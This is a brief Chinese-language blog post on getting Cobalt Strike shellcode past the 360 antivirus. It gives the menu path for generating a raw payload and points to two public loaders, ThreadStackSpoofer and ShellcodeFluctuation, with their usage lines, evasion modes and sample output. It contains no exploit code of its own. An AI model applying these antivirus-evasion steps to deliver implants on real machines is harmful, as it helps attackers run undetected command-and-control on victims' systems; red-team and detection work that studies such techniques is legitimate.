cobalt strike免杀360

本文最后更新于 2025年7月14日 凌晨

0、简介 🛡️

CS 生成 Raw 格式的 shellcode:

Attacks ——> packages ——> Payload Generator,选择一个 listener,生成 payload.bin。

1、ThreadStackSpoofer 加载器 🧠

ThreadStackSpoofer 加载器通过堆栈欺骗技术实现免杀。

工具地址:mgeeky / ThreadStackSpoofer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Usage: C:\> ThreadStackSpoofer.exe <shellcode> <spoof>
[.] Reading shellcode bytes...
[.] Hooking kernel32!Sleep...
[.] Injecting shellcode...
[+] Shellcode is now running.
[>] Original return address: 0x1926747bd51. Finishing call stack...

===> MySleep(5000)

[<] Restoring original return address...
[>] Original return address: 0x1926747bd51. Finishing call stack...

===> MySleep(5000)

[<] Restoring original return address...
[>] Original return address: 0x1926747bd51. Finishing call stack...

image-2

2、ShellcodeFluctuation 加载器 🔄

ShellcodeFluctuation 加载器通过循环加密和解密 shellcode 的内容实现免杀。

工具地址:mgeeky / ShellcodeFluctuation

1
2
3
4
5
6
Usage: C:\> ShellcodeFluctuation.exe <shellcode> <fluctuate>
<fluctuate>:
-1 - 读取 shellcode,但不注入,运行无限循环。
0 - 注入 shellcode,但不 hook kernel32!Sleep,也不加密。
1 - 注入 shellcode,使用标准 PAGE_READWRITE 开始波动其内存。
2 - 注入 shellcode,使用 ORCA666 的 PAGE_NOACCESS 开始波动其内存。

img